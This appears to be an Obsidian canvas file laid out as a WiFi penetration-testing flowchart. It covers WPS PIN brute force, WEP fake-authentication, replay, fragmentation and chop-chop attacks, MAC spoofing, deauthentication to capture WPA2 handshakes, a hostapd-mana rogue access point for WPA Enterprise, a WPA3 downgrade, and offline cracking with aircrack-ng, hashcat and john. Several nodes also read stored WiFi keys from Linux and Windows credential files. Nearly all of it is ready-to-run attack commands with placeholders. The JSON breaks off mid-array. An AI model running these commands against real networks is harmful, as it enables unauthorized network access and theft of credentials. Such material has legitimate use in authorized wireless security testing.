{
	"nodes":[
		{"type":"group","id":"7509f9ac0e1cbfd7","x":-800,"y":-4800,"width":5200,"height":3034,"color":"1","label":"WEP"},
		{"type":"group","id":"73c06fd47cfc26a8","x":6196,"y":-6240,"width":5222,"height":2720,"color":"#d4ff00","label":"Connect to WiFi network"},
		{"type":"group","id":"3786186436e72dba","x":-600,"y":-1600,"width":5120,"height":2640,"color":"5","label":"WPA2 Enterprise"},
		{"type":"group","id":"353bc6c016ac56ff","x":-5280,"y":-6580,"width":3760,"height":2799,"color":"#28c908","label":"Getting started"},
		{"id":"eb7d329b6a73cc24","type":"group","x":5600,"y":-1821,"width":3906,"height":2347,"color":"#ff7b00","label":"Cracking Authentication Hashes"},
		{"id":"04cf4cc33ef9ef33","type":"group","x":-600,"y":2320,"width":4600,"height":1440,"color":"#004cff","label":"WPA3 - SAE"},
		{"type":"group","id":"1a3b335e2e78aafb","x":-5020,"y":-5600,"width":3320,"height":1250,"color":"#ff00bb","label":"Find WiFi networks"},
		{"id":"5dc77c495ed4654d","type":"group","x":-400,"y":-2815,"width":4680,"height":851,"color":"#1b34b1","label":"Bypassing WEP Shared Key Authentication"},
		{"id":"9fa4d845dc7f2aa9","type":"group","x":-400,"y":-4424,"width":4680,"height":800,"color":"4","label":"Connected Clients"},
		{"type":"group","id":"6d910cb171d614f6","x":-580,"y":1360,"width":4619,"height":640,"color":"2","label":"WPA2"},
		{"id":"25c4802e1b403188","type":"group","x":-400,"y":-3514,"width":4800,"height":514,"color":"1","label":"Clientless WEP Networks"},
		{"id":"c6a15e22d09a7197","type":"group","x":5906,"y":-740,"width":1920,"height":966,"color":"#a000cc","label":"WPA2"},
		{"type":"group","id":"eb4d0968e9811a98","x":-4550,"y":-6405,"width":2380,"height":599,"color":"#00fffb","label":"Monitor mode"},
		{"type":"group","id":"623df9e896e86029","x":-634,"y":-6360,"width":1861,"height":760,"color":"3","label":"WPS"},
		{"type":"group","id":"f0ded9d346a0e611","x":-4200,"y":-3162,"width":1170,"height":1201,"color":"#d21ec3","label":"Bypass MAC Filtering"},
		{"type":"group","id":"5e3ae9c643a3683f","x":-960,"y":-7280,"width":1856,"height":520,"color":"#598ab1","label":"WiFi Passwords from local machine"},
		{"id":"d3d276d129620a47","type":"group","x":6318,"y":-7240,"width":2242,"height":360,"color":"#ff621f","label":"Configure NIC to managed mode"},
		{"id":"27f998981ee2a143","type":"group","x":5906,"y":-1236,"width":1535,"height":360,"color":"#bb1b91","label":"WPA Enterprise"},
		{"type":"group","id":"d1c7b6acc95a3334","x":-904,"y":-7060,"width":1220,"height":260,"color":"#2abaea","label":"Linux"},
		{"type":"group","id":"afd86401aa172d79","x":1737,"y":178,"width":805,"height":360,"color":"5","label":"mana.conf"},
		{"type":"group","id":"4be7523075fc13a8","x":298,"y":-432,"width":766,"height":260,"color":"5","label":"/etc/freeradius/3.0/certs/ca.cnf"},
		{"type":"group","id":"243b93a6772163db","x":298,"y":-82,"width":766,"height":260,"color":"5","label":"/etc/freeradius/3.0/certs/server.cnf"},
		{"type":"group","id":"a5d695994851b96c","x":1960,"y":-680,"width":1050,"height":157,"color":"5","label":"mana.eap_user"},
		{"id":"4b754bafc68f606a","type":"group","x":-4080,"y":-4240,"width":820,"height":180,"color":"#ededed","label":"Identify SSID of HIDDEN network"},
		{"id":"7818fcb2b0c59e0d","type":"group","x":3260,"y":-3813,"width":970,"height":149,"color":"#44a700","label":"Interactive packet replay attack with a capture file - TERMINAL 4"},
		{"id":"b17c63fa85d4144f","type":"group","x":3260,"y":-4044,"width":970,"height":140,"color":"#43a800","label":"Interactive packet replay attack - TERMINAL 4"},
		{"type":"group","id":"2bd8ab48255d3f32","x":413,"y":-3924,"width":965,"height":140,"color":"6","label":"Capture data in WEP network - TERMINAL 1"},
		{"type":"group","id":"3ff15083b0ff661e","x":-320,"y":-2704,"width":965,"height":140,"color":"6","label":"Capture data in WEP network - TERMINAL 1"},
		{"id":"d9f4e16ce0a175cd","type":"group","x":5719,"y":-1701,"width":954,"height":135,"color":"#8a003c","label":"WEP"},
		{"type":"group","id":"46d46fdaf845dad6","x":-904,"y":-7210,"width":1220,"height":100,"color":"#086f91","label":"Windows"},
		{"id":"f4f0489ab4e36bc4","type":"group","x":2863,"y":-3447,"width":717,"height":167,"color":"#196594","label":"Forging ARP packet with the xor packet - TERMINAL 5"},
		{"id":"c8cba7334a9ca61b","type":"group","x":2863,"y":-3187,"width":717,"height":167,"color":"#196594","label":"Forging ARP packet with the xor packet - TERMINAL 5"},
		{"id":"c1b6c3794d38cea1","type":"group","x":1163,"y":-1000,"width":977,"height":120,"color":"3","label":"Extract username(s)"},
		{"type":"group","id":"33c00a794ae345cb","x":365,"y":-1240,"width":965,"height":120,"color":"6","label":"Capture certificate with a handshake - TERMINAL 1"},
		{"type":"group","id":"ddcda96acafbe732","x":-165,"y":1560,"width":965,"height":120,"color":"6","label":"Capture WPA/WPA2 handshake - TERMINAL 1"},
		{"type":"group","id":"7b41e3f1043b1f2d","x":120,"y":-4265,"width":965,"height":120,"color":"6","label":"Capture data in WEP network - TERMINAL 1"},
		{"id":"e50176a160d94b05","type":"group","x":2060,"y":-3924,"width":803,"height":140,"color":"#4d1dd3","label":"Fake authentication attack - TERMINAL 3"},
		{"id":"eb44e33cd875be37","type":"group","x":1268,"y":-2704,"width":802,"height":140,"color":"#4d1dd3","label":"Fake authentication attack It should failed - TERMINAL 3 "},
		{"id":"187075173628d87e","type":"group","x":3400,"y":-2704,"width":700,"height":160,"color":"#f726f0","label":"ARP replay attack - TERMINAL 4"},
		{"id":"9a1c1a7d494dbaca","type":"group","x":2600,"y":-2704,"width":660,"height":160,"color":"#14807e","label":"Fake shared key authentication - TERMINAL 5"},
		{"type":"group","id":"b2704f88d2bc1ae7","x":-40,"y":-3424,"width":860,"height":120,"color":"6","label":"Capture data in WEP network - TERMINAL 1"},
		{"type":"group","id":"125f375923c984a9","x":-40,"y":-3164,"width":860,"height":120,"color":"6","label":"Capture data in WEP network - TERMINAL 1"},
		{"id":"3fb0a170b30fe360","type":"group","x":3620,"y":-3453,"width":660,"height":149,"color":"#44a700","label":"Interactive packet replay attack with a capture file - TERMINAL 6"},
		{"id":"e75a4dc77ce15452","type":"group","x":3620,"y":-3178,"width":660,"height":149,"color":"#44a700","label":"Interactive packet replay attack with a capture file - TERMINAL 6"},
		{"id":"4cc8cb05c7a52525","type":"group","x":1700,"y":-4265,"width":803,"height":120,"color":"#4d1dd3","label":"Fake authentication attack - TERMINAL 3"},
		{"type":"group","id":"ae2f35e670e2782b","x":1960,"y":-1240,"width":800,"height":120,"color":"#ffffff","label":"Deauthentication attack - TERMINAL 2"},
		{"type":"group","id":"761e5242dd34cdab","x":3430,"y":-4265,"width":800,"height":120,"color":"#ffffff","label":"Deauthentication attack - TERMINAL 5"},
		{"type":"group","id":"f9c571d7694b0a53","x":870,"y":1560,"width":800,"height":120,"color":"#ffffff","label":"Deauthentication attack - TERMINAL 2"},
		{"type":"group","id":"fe7809601e9c0902","x":3600,"y":-120,"width":800,"height":120,"color":"#ffffff","label":"Deauthentication attack - TERMINAL 2"},
		{"type":"group","id":"4a3e2ccd48aa3cd5","x":2600,"y":3060,"width":800,"height":120,"color":"#ffffff","label":"Deauthentication attack - TERMINAL 2"},
		{"id":"4ab1d8972b8e5bba","type":"group","x":1400,"y":-3424,"width":780,"height":120,"color":"#4d1dd3","label":"Fake authentication attack - TERMINAL 3"},
		{"id":"e16c561c18102aa9","type":"group","x":1400,"y":-3164,"width":780,"height":120,"color":"#4d1dd3","label":"Fake authentication attack - TERMINAL 3"},
		{"type":"group","id":"d098e1b7364d8317","x":2360,"y":-2424,"width":740,"height":120,"color":"#ffffff","label":"Deauthentication attack - TERMINAL 4"},
		{"type":"group","id":"e731b0176e46165a","x":2360,"y":-2244,"width":740,"height":120,"color":"#ffffff","label":"Deauthentication attack - TERMINAL 4"},
		{"id":"c47f458789dd22f7","type":"group","x":2560,"y":-4265,"width":700,"height":120,"color":"#f726f0","label":"ARP replay attack - TERMINAL 4"},
		{"type":"group","id":"06df5d7d1790399a","x":-520,"y":-482,"width":460,"height":180,"color":"4","label":"Wireshark"},
		{"id":"83c5361d9b71ee86","type":"group","x":2200,"y":-3424,"width":640,"height":120,"color":"#000000","label":"Fragmentation attack - TERMINAL 4"},
		{"id":"f4f31f4efc8d9f82","type":"group","x":2209,"y":-3164,"width":631,"height":120,"color":"#5c5b5d","label":"Chop Chop attack - TERMINAL 4"},
		{"id":"d7ceeb6e51d5e773","type":"group","x":1447,"y":-3924,"width":507,"height":140,"color":"#a29506","label":"Get MAC address NIC - TERMINAL 2"},
		{"id":"d92da294b4e5fa45","type":"group","x":720,"y":-2704,"width":507,"height":140,"color":"#a29506","label":"Get MAC address NIC - TERMINAL 2"},
		{"id":"c7557f6933d48f04","type":"group","x":840,"y":-3164,"width":537,"height":120,"color":"#a29506","label":"Get MAC address NIC - TERMINAL 2"},
		{"id":"535b99ae4fe3e770","type":"group","x":840,"y":-3424,"width":537,"height":120,"color":"#a29506","label":"Get MAC address NIC - TERMINAL 2"},
		{"id":"c36481351b1b122b","type":"group","x":1124,"y":-4265,"width":507,"height":120,"color":"#a29506","label":"Get MAC address NIC - TERMINAL 2"},
		{"id":"1d90f19f2cad1d4c","type":"group","x":-2800,"y":-5360,"width":435,"height":88,"color":"#fff700","label":"2.4GHz"},
		{"id":"f2167442ed366c77","type":"group","x":-2800,"y":-5224,"width":435,"height":88,"color":"#ffc800","label":"5GHz"},
		{"type":"text","text":"Open \n```\n=> `Extensible Authentication Protocol`\n==> `Tansport Laer Security`\n====> `TLSv1.2 Record Layer: Handshake Protocol: Certificate`\n========>`Handshake Protocol: Certificate`\n============>`Certificates`\n```\nFor each certificate:\n- Right click on it with the mouse\n- Export Packet Bytes\n- Save as cert.der\n","id":"df725c8617ee141b","x":-560,"y":-182,"width":740,"height":458},
		{"type":"text","text":"WPA - MGT","id":"d7eac2f12e7eba02","x":-1954,"y":-4800,"width":168,"height":60,"color":"5"},
		{"id":"4bfa087c08e11e3e","type":"text","text":"WPS","x":-1954,"y":-5204,"width":124,"height":60,"color":"3"},
		{"type":"text","text":"Identify target","id":"bf7bad7e498a24cc","x":-2247,"y":-5204,"width":202,"height":60,"color":"#ff00bb"},
		{"type":"text","text":"Identify target","id":"7dcb8ff01aab12f0","x":-2178,"y":-4970,"width":202,"height":60,"color":"#ff00bb"},
		{"type":"text","text":"```bash\nmacchanger --mac <deauthed client MAC address> <monitor wirelss card>\n```","id":"23e31c870e89f575","x":-4104,"y":-2521,"width":776,"height":60},
		{"type":"text","text":"```bash\nifconfig <monitor wireless card> down\n```","id":"6962e3bf35c6f6db","x":-4067,"y":-2641,"width":701,"height":60},
		{"type":"text","text":"```bash\nifconfig <monitor wireless card>\n```","id":"dd4a154eae237193","x":-3955,"y":-2401,"width":479,"height":60},
		{"type":"text","text":"```bash\naireplay-ng -3 -b <bssid> -h <stolen MAC address> <monitor wireless card>\n```","id":"a33c95c698b82a9c","x":-4156,"y":-2261,"width":882,"height":80},
		{"id":"019d0c00962c36ec","type":"text","text":"```bash\niw dev <INTERFACE> interface add mon0 type monitor\n```","x":-4146,"y":-6309,"width":570,"height":60},
		{"type":"text","text":"WEP","id":"487934e29d837350","x":-3140,"y":-4970,"width":320,"height":60,"color":"#ff00bb"},
		{"type":"text","text":"```bash\nsudo airmon-ng start <INTERFACE>\n```","id":"c45f107b8a8b6bb4","x":-3673,"y":-6141,"width":537,"height":60},
		{"type":"text","text":"```bash\nsudo airmon-ng start <INTERFACE> <CHANNEL>\n```","id":"40ad9469694b1138","x":-3673,"y":-6051,"width":537,"height":60},
		{"type":"text","text":"WEP","id":"9e5b7ab5bcb28017","x":-1892,"y":-4970,"width":124,"height":60,"color":"1"},
		{"type":"text","text":"```bash\nsudo airmon-ng start <wireless card>\n```","id":"26228ae0d4326e4b","x":-3975,"y":-3121,"width":515,"height":57},
		{"type":"text","text":"```bash\naireplay-ng -0 0 -a <BSSID> -c <Client> <monitor wireless card>\n```","id":"1f299914a851063d","x":-4096,"y":-2761,"width":759,"height":60},
		{"type":"text","text":"```bash\nairodump-ng -c <channel> --bssid <bssid> -w <output file> <monitor wireless card>\n```","id":"29160f54a9ed0287","x":-4160,"y":-3001,"width":885,"height":60},
		{"type":"text","text":"```bash\naireplay-ng -0 0 -a <BSSID> -c <Client> <monitor wireless card>\n```","id":"57bd4fc7e685c2c5","x":-4089,"y":-2881,"width":744,"height":60},
		{"type":"text","text":"```bash\nmdk4 <INTERFACE> p -t <MAC-WIFI-AP> -f <WORDLIST>\n```","id":"75db123891ff7b7c","x":-3925,"y":-4180,"width":561,"height":60},
		{"type":"text","text":"WPA2","id":"6efad66b26e9d7ef","x":-1910,"y":-4600,"width":124,"height":60,"color":"2"},
		{"type":"text","text":"WPA3","id":"311698394745edd7","x":-1910,"y":-4470,"width":124,"height":60,"color":"#004cff"},
		{"id":"925af61ded52258e","type":"text","text":"```bash\nwash -i <INTERFACE>\n```","x":-2767,"y":-5344,"width":367,"height":60},
		{"id":"3966d18d87f0bb5d","type":"text","text":"```bash \niwconfig mon0\n```","x":-3040,"y":-6309,"width":250,"height":60},
		{"id":"b422cfaebe616929","type":"text","text":"```bash\nifconfig mon0 up\n```","x":-3386,"y":-6309,"width":250,"height":60},
		{"type":"text","text":"Hidden network","id":"ab49ad6483b1b869","x":-3213,"y":-4500,"width":201,"height":60,"color":"#ff00bb"},
		{"id":"079ad5799beb171d","type":"text","text":"```bash\nsudo airodump-ng --encrypt WEP <INTERFACE>\n```","x":-2767,"y":-4970,"width":520,"height":60},
		{"id":"805420d3c43fc829","type":"text","text":"```bash\nwash -5 -i <INTERFACE>\n```","x":-2767,"y":-5204,"width":367,"height":60},
		{"id":"5dd345cafa5348fd","type":"text","text":"```bash\nsudo airodump-ng <INTERFACE> --wps\n```","x":-2790,"y":-5080,"width":427,"height":60},
		{"id":"32053a38b8cd30e1","type":"text","text":"```bash\nnmcli dev wifi list\n```","x":-4155,"y":-4940,"width":510,"height":60},
		{"type":"text","text":"```bash\nsudo ifconfig <INTERFACE> down\n```                             ","id":"9dc71efbeb1f808f","x":-4146,"y":-5946,"width":390,"height":68},
		{"type":"text","text":"WPS","id":"d58f97ec02810a99","x":-3200,"y":-5204,"width":320,"height":60,"color":"#ff00bb"},
		{"type":"text","text":"```bash\nsudo ifconfig <INTERFACE> up           \n```","id":"41f9457baa0fdf8e","x":-3180,"y":-5946,"width":400,"height":68},
		{"id":"d0bb947e7f7aa070","type":"text","text":"OPN","x":-3437,"y":-5544,"width":124,"height":60,"color":"#d4ff00"},
		{"type":"text","text":"```bash\nsudo iwconfig <INTERFACE> mode monitor \n```","id":"fd56b7283ca8134b","x":-3700,"y":-5946,"width":451,"height":68},
		{"id":"fe92e5d390ee8e94","type":"text","text":"```bash\niwlist scan\n```","x":-4155,"y":-4830,"width":510,"height":60},
		{"type":"text","text":"Identify target","id":"6a5963af14a7fbac","x":-3418,"y":-4830,"width":204,"height":60,"color":"#ff00bb"},
		{"type":"text","text":"```bash\nsudo airmon-ng check kill\n```","id":"246fbcdb052ebacb","x":-4150,"y":-6111,"width":394,"height":60},
		{"type":"text","text":"```bash\nsudo airodump-ng <INTERFFACE> --band abg\n```","id":"6aaf8820e36a0032","x":-4155,"y":-4740,"width":510,"height":60},
		{"type":"text","text":"Public known networks (SSID)","id":"e0a373c510efe328","x":-4620,"y":-4830,"width":320,"height":60,"color":"#ff00bb"},
		{"type":"text","text":"Setup monitor  interface","id":"a5c2e947783005e7","x":-4510,"y":-6136,"width":200,"height":110,"color":"#00fffb"},
		{"type":"text","text":"```bash\nsudo airodump-ng -c <CHANNEL> --bssid <MAC AP> -w <FILENAME> <INTERFACE>\n```","id":"ad6893ff76f6ea62","x":410,"y":-1207,"width":797,"height":67},
		{"id":"d19aeb3b9d513cfe","type":"text","text":"```bash\necho 'DOMAIN\\user' > test.user\n```","x":632,"y":-1536,"width":462,"height":56},
		{"id":"5924a09284808ac5","type":"text","text":"Got Handshake?","x":2301,"y":-990,"width":393,"height":80,"color":"#ffffff"},
		{"id":"2fe20ded3f2ebf4c","type":"text","text":"Got hash?","x":4080,"y":596,"width":250,"height":60,"color":"#ffffff"},
		{"type":"text","text":"```bash\nsudo aireplay-ng -0 1 -a <AP_MAC> -c <Client_MAC> <interface>\n```","id":"83c19b371405b365","x":3651,"y":-87,"width":709,"height":67},
		{"id":"6dbae79882b21845","type":"text","text":"Got hash?","x":4080,"y":-720,"width":250,"height":60,"color":"#ffffff"},
		{"id":"cf2d877453327951","type":"text","text":"```bash\naireplay-ng -1 60 -e <ESSID> -y wepshared-<NAME>.xor -a <BSSID> -h <YOUR_MAC> <INTERFACE>\n```","x":2632,"y":-2694,"width":585,"height":120},
		{"id":"416446930e2b9456","type":"text","text":"```bash\n./air-hammer.py -i <INTERFACE> -e <SSID> -P <PASSWORD> -u usernames-with-domain.txt\n```","x":1680,"y":-1420,"width":1048,"height":60},
		{"id":"037f78ea44866622","type":"text","text":"```bash\ncat top-usernames-shortlist.txt | awk '{print \"<DOMAIN>\\\\\" $1}' > usernames-with-domain.txt\n```","x":632,"y":-1420,"width":931,"height":60},
		{"id":"4f0e60a39024ece2","type":"text","text":"Brute force","x":58,"y":-1480,"width":250,"height":60,"color":"5"},
		{"id":"f289c0646703d83c","type":"text","text":"Attack as rogue AP","x":58,"y":-1281,"width":250,"height":60,"color":"5"},
		{"id":"74dcaf0b358ecd1c","type":"text","text":"```bash\n./air-hammer.py -i <INTERFACE> -e <SSID> -p /usr/share/wordlists/rockyou.txt -u test.user \n```","x":1156,"y":-1536,"width":1048,"height":56},
		{"id":"1096fffcf7342824","type":"text","text":"Attack WPA Enterprise","x":-473,"y":-1360,"width":250,"height":79,"color":"5"},
		{"type":"text","text":"```bash\nopenssl x509 -inform der -in <CERTIFICATE_FILENAME> -text\n```","id":"0e817f9ca017f45d","x":403,"y":428,"width":677,"height":60},
		{"id":"8c75a937f6fce473","type":"text","text":"```bash\naireplay-ng -3 -b <BSSID> -h <YOUR_MAC> <INTERFACE>\n```","x":3440,"y":-2666,"width":599,"height":60},
		{"id":"ef6bdb1abce19a58","type":"text","text":"```bash\nmacchanger --show <INTERFACE>\n```","x":740,"y":-2664,"width":410,"height":60},
		{"type":"text","text":"```bash\nsudo airodump-ng -c <AP_CHANNEL> --bssid <AP_MAC> -w <CAPTURE-FILENAME> <INTERFACE>\n```","id":"e72cc081783ea78d","x":-275,"y":-2664,"width":869,"height":60},
		{"id":"06b70fbca2fa9001","type":"text","text":"Is there a client connected?","x":2204,"y":-2689,"width":201,"height":110,"color":"#000000"},
		{"id":"454024dd16da6f18","type":"text","text":"```bash\naireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>\n```","x":1311,"y":-2669,"width":711,"height":70},
		{"id":"3bdceb08c66ccdc5","type":"text","text":"```bash\nsudo airmon-ng stop <INTERFACE>\n```","x":6740,"y":-7108,"width":401,"height":81},
		{"id":"bec4ce138f88cc09","type":"text","text":"```bash\nsudo reaver -b <BSSID-MAC-AP> -i <INTERFACE> -v\n```","x":51,"y":-5890,"width":620,"height":60},
		{"id":"d619fa8f8f3de7b0","type":"text","text":"```bash\nsudo reaver -b <BSSID-MAC-AP> -i <INTERFACE> -v -K\n```","x":51,"y":-5770,"width":620,"height":60},
		{"type":"text","text":"http://3wifi.stascorp.com/wpspin","id":"108037c8ef838a2b","x":135,"y":-6260,"width":378,"height":60},
		{"id":"40b951370a276c76","type":"text","text":"```bash\nservice NetworkManger start\n```","x":7660,"y":-7000,"width":500,"height":59},
		{"id":"060cb367d76523e1","type":"text","text":"Restart \nnetwork manager","x":7240,"y":-7104,"width":220,"height":74,"color":"#ff621f"},
		{"id":"008cd453c6c99975","type":"text","text":"Ready to rumble","x":8280,"y":-7104,"width":220,"height":74,"color":"#ff621f"},
		{"id":"35483d7d41d3a04c","type":"text","text":"```bash\nsudo systemctl restart systemd-networkd\n```","x":7660,"y":-7097,"width":500,"height":60},
		{"id":"bc974c9ff95dc503","type":"text","text":"Stop monitor mode","x":6380,"y":-7094,"width":250,"height":54,"color":"#ff621f"},
		{"id":"909a676b85d0aca0","type":"text","text":"```bash\nsystemctl restart NetworkManager.service\n```","x":7660,"y":-7197,"width":500,"height":81},
		{"id":"b5e1bae809c596f4","type":"text","text":"```bash\niw dev <INTERFACE> interface del\n```","x":6740,"y":-7187,"width":401,"height":60},
		{"id":"2988e6c939c24cfe","type":"text","text":"Got password?","x":886,"y":-5830,"width":250,"height":60,"color":"#ffffff"},
		{"type":"text","text":"Default pin","id":"b719c87c69d77e63","x":-409,"y":-6200,"width":250,"height":60,"color":"3"},
		{"type":"text","text":"Brute Force Attack","id":"bf4a15b40e802ce9","x":-409,"y":-5890,"width":250,"height":60,"color":"3"},
		{"type":"text","text":"Online","id":"ef354b711c29d182","x":-69,"y":-6260,"width":144,"height":60},
		{"type":"text","text":"Offline","id":"92e2e1c866188688","x":-69,"y":-6147,"width":144,"height":60},
		{"type":"text","text":"PixieWPS attack","id":"dd5b934ff38b90bd","x":-409,"y":-5770,"width":250,"height":60,"color":"3"},
		{"type":"text","text":"```bash\nsudo grep psk= /etc/NetworkManager/system-connections/*\n```","id":"ec028a45854fa530","x":-884,"y":-7040,"width":620,"height":60},
		{"type":"text","text":"WEP Network","id":"38cc2cd1a255da5e","x":8095,"y":-5731,"width":250,"height":60,"color":"#d4ff00"},
		{"id":"1335d721e71aea22","type":"text","text":"```bash\njohn hash.jtr --wordlist=/usr/share/wordlists/rockyou.txt\n```","x":5966,"y":-1076,"width":798,"height":60},
		{"id":"49dbe47d75bd6540","type":"text","text":"Handshake valid?","x":6295,"y":-560,"width":250,"height":50,"color":"#000000"},
		{"id":"dd66ff335112c135","type":"text","text":"```bash\nsudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <MAC-AP> <FILENAME-CAPTURE>.cap \n```","x":5966,"y":-700,"width":1260,"height":60},
		{"id":"92232e2408b1abcc","type":"text","text":"```bash\nls -al /etc/NetworkManager/system-connections/\n```","x":-884,"y":-6920,"width":540,"height":60},
		{"type":"text","text":"```cmd\nnetsh wlan show profiles\n```\n","id":"57aa773773fac667","x":-884,"y":-7190,"width":407,"height":60},
		{"id":"29950f4be503c120","type":"text","text":"```bash\ncat /etc/NetworkManager/system-connections/example.nmconnection\n```","x":-317,"y":-6940,"width":586,"height":100},
		{"type":"text","text":"```cmd\nnetsh wlan show profiles name=\"<network name>\" key=clear\n```","id":"c606fc2881940d3a","x":-404,"y":-7190,"width":673,"height":60},
		{"id":"ee95518dec150559","type":"text","text":"Got password/key?","x":536,"y":-7070,"width":250,"height":60,"color":"#ffffff"},
		{"id":"bde03313ad7bbc9c","type":"text","text":"```bash\nhashcat -m 22000 -w 3 wifiHashes.txt /usr/share/wordlists/rockyou.txt \n```","x":6674,"y":-200,"width":747,"height":60},
		{"id":"4ffeb36b3a406057","type":"text","text":"```bash\nsudo hashcat -a 0 -m 2500 hostapd.hccapx /usr/share/wordlists/rockyou.txt --force\n```","x":5966,"y":-108,"width":1024,"height":60},
		{"id":"d1ea0e774236e5d9","type":"text","text":"```bash\nhcxpcapngtool <FILENAME-CAPTURE>.cap -o wifiHashes.txt\n```","x":5966,"y":-200,"width":648,"height":60},
		{"id":"f134832b566fcf3a","type":"text","text":"```bash\ncowpatty -f /usr/share/wordlists/rockyou.txt -r <FILENAME-CAPTURE>.cap -s <SSID>\n```","x":6615,"y":-466,"width":866,"height":60},
		{"id":"1a434365cc7b28cd","type":"text","text":"```bash\njohn --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -e <ESSID> -w - ~/<FILENAME-CAPTURE>.cap \n```","x":5966,"y":-360,"width":1260,"height":60},
		{"id":"254c757f0bdd3996","type":"text","text":"```bash \ncowpatty -r <FILENAME-CAPTURE>.cap -c\n```","x":5966,"y":-466,"width":454,"height":60},
		{"id":"ae9359a879691193","type":"text","text":"Got password?","x":6847,"y":-1076,"width":250,"height":60,"color":"#ffffff"},
		{"id":"056dde338b02633d","type":"text","text":"Got password?","x":7560,"y":-360,"width":250,"height":60,"color":"#ffffff"},
		{"id":"f2761848f3392429","type":"text","text":"No handshake and no hash?","x":3525,"y":-480,"width":815,"height":108,"color":"#ffffff"},
		{"type":"text","text":"```bash\nhostapd-mana /etc/hostapd-mana/mana.conf\n```","id":"792983bc390add52","x":2937,"y":-182,"width":482,"height":60},
		{"id":"a4e95815022088b5","type":"text","text":"```bash\nhostapd-wpe /etc/hostapd-mana/mana.conf\n```","x":2937,"y":-12,"width":482,"height":60},
		{"id":"677a9e768caa69e3","type":"text","text":"```bash\nasleap -C -R asleap -C <VALUE1> -R <value2> -W /usr/share/john/password.lst\n```","x":5966,"y":-1176,"width":798,"height":60},
		{"id":"15e496dc3b133ce6","type":"text","text":"\n```bash\nhashcat -m 5500 hash.hashcat /usr/share/wordlists/rockyou.txt \n```","x":5966,"y":-976,"width":798,"height":60},
		{"id":"f80fbd5ea5ad2ca8","type":"text","text":"```bash\nsudo aircrack-ng <FILENAME-CAPTURE>.cap\n```","x":5779,"y":-1661,"width":494,"height":60},
		{"id":"051079dca576ff13","type":"text","text":"Got key?","x":6333,"y":-1661,"width":250,"height":60,"color":"#ffffff"},
		{"id":"5592eb2543846363","type":"text","text":"Got Credentials?","x":4090,"y":-1420,"width":250,"height":60,"color":"#ffffff"},
		{"id":"3261395807851f33","type":"text","text":"```bash\naireplay-ng -0 1 -a <BSSID> -c <CLIENT_MAC> <INTERFACE>\n```","x":2400,"y":-2404,"width":625,"height":60},
		{"id":"1eeb8cbfffcdf8bf","type":"text","text":"Is there a client connected?","x":3639,"y":-2454,"width":201,"height":110,"color":"#000000"},
		{"type":"text","text":"```mana-eap_user\n*     PEAP,TTLS,TLS,FAST\n\"t\"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    \"pass\"   [2]\n```","id":"4c8eb559e9c713f3","x":1980,"y":-660,"width":920,"height":100},
		{"id":"2f8605667a20c18e","type":"text","text":"```bash\nmake destroycerts\n```","x":2142,"y":-212,"width":340,"height":60},
		{"id":"a200026e27b66b61","type":"text","text":"```bash\naireplay-ng -0 1 -a <BSSID> -c <CLIENT_MAC> <INTERFACE>\n```","x":2400,"y":-2224,"width":625,"height":60},
		{"type":"text","text":"```bash\nsudo aireplay-ng -0 1 -a <AP_MAC> -c <Client_MAC> <interface>\n```","id":"94240bce1d757502","x":2011,"y":-1207,"width":709,"height":67},
		{"type":"text","text":"```bash \nmv mana.eap_user /etc/hostapd-mana/mana.eap_user\n```","id":"179cc2370c83ee40","x":2160,"y":-102,"width":675,"height":60},
		{"type":"text","text":"Down grade","id":"893b75565d3d7a8d","x":-280,"y":3097,"width":200,"height":60,"color":"#004cff"},
		{"id":"fb1e387b4f77d76b","type":"text","text":"Got handshake?","x":3575,"y":3097,"width":250,"height":60,"color":"#ffffff"},
		{"id":"402d3cbb68792eaa","type":"text","text":"```hostapd-sae_conf\ninterface=<INTERFACE>\ndriver=nl80211\nhw_mode=g\nchannel=<CHANNEL>\nssid=<WIFI-NETWORK-NAME>\nmana_wpaout=hostapd-management.hccapx\nwpa=2\nwpa_key_mgmt=WPA-PSK\nwpa_pairwise=TKIP CCMP\nwpa_passphrase=12345678\n```","x":1972,"y":3300,"width":672,"height":308},
		{"type":"text","text":"```bash\nsudo aireplay-ng <interface> -0 0 -a <AP_MAC> -c <Client_MAC>\n```","id":"f2b5c00533fb3f2a","x":2651,"y":3093,"width":709,"height":67},
		{"id":"0e91a0726353d33a","type":"text","text":"```bash\nhostapd-mana hostapd-sae.conf\n```","x":2100,"y":3093,"width":415,"height":67},
		{"type":"text","text":"Brute force","id":"4bc734617858ee2e","x":-280,"y":2640,"width":200,"height":60,"color":"#004cff"},
		{"type":"text","text":"Go to: Connect to WiFi network","id":"d03bb4b6f6ec7241","x":3600,"y":2640,"width":345,"height":60,"color":"#d4ff00"},
		{"id":"b6ce6252cf41502c","type":"text","text":"Got password?","x":3160,"y":2640,"width":250,"height":60,"color":"#ffffff"},
		{"id":"f690ccfa62b4134e","type":"text","text":"```\nwireshark <CAPTURED-FILE-WIFI-NETWORK.cap>\n```","x":80,"y":3097,"width":492,"height":60},
		{"id":"75257d3baa5dd46f","type":"text","text":"Management Frame Protection (MFP/MPF) is set to disable","x":1556,"y":3073,"width":356,"height":108,"color":"#ffffff"},
		{"id":"edf925008e710168","type":"text","text":"```bash\n./wacker.py --wordlist /usr/share/wordlists/rockyou.txt --ssid <SSID> --bssid <MAC-AP> --interface <interface> --freq <FREQ>\n```","x":480,"y":2640,"width":1386,"height":60},
		{"type":"text","text":"```bash\nsudo aireplay-ng -0 1 -a <AP_MAC> -c <Client_MAC> <interface>\n```","id":"4f7efd3f740180b2","x":921,"y":1593,"width":709,"height":67},
		{"id":"4079177692ecc68f","type":"text","text":"Got Handshake?","x":3650,"y":1593,"width":250,"height":67,"color":"#ffffff"},
		{"type":"text","text":"```bash\nsudo airodump-ng -c <CHANNEL> --bssid <MAC AP> -w <FILENAME> <INTERFACE>","id":"858519a27e6c9f05","x":-120,"y":1593,"width":797,"height":67},
		{"id":"d1005717e3966111","type":"text","text":"```bash\ntshark -r <FILENAME-CAPTURED-FILE.cap> -Y \"ssl.handshake.certificate and eapol\" -T fields -e \"tls.handshake.certificate\" |sed \"s/://g\" | xxd -ps -r | tee $(mktemp $tmpbase.cert.XXXX.der) | openssl x509 -inform der -text\n```","x":280,"y":-840,"width":1200,"height":110},
